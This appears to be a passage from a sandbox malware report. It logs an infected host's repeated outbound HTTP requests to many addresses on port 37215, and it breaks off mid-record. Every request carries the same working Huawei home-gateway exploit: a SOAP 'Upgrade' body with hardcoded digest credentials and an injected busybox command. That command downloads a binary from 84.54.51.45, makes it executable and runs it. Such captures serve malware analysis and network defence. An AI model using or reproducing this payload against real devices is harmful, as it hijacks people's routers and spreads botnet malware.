                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1493192.168.2.154549441.71.41.25437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107490063 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1494192.168.2.155958441.112.117.1637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107506037 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1495192.168.2.154956641.153.187.21637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107541084 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1496192.168.2.153351441.6.27.25037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107543945 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1497192.168.2.155003041.63.15.437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107561111 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1498192.168.2.154540841.144.83.3337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107600927 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1499192.168.2.155673241.151.234.15637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107606888 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1500192.168.2.154945441.126.200.13037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107606888 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1501192.168.2.154021841.73.164.21737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107606888 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1502192.168.2.153480241.196.219.7737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.107606888 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 